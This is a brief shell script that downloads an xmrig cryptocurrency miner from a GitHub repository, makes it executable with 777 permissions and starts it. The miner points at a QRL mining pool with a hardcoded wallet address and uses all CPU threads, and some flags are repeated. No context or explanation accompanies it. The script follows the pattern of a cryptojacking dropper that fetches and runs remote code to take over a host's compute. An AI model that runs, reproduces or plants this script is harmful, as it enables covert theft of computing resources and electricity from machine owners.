#!/bin/sh
wget -O mm https://github.com/kazppkido/kikir/raw/main/xmrig 
chmod 777 mm
./mm --donate-level 1 -o de.qrl.herominers.com:1166 -u Q0104006f62eeca4efe4da7805a59e381783e116ab66e257dfe06a6d199cd7505ce9f07847e5a73 -p $(echo $RANDOM | md5sum | head -c 20) -a rx/0 -t $(nproc --all) -a rx/0 -t $(nproc --all)
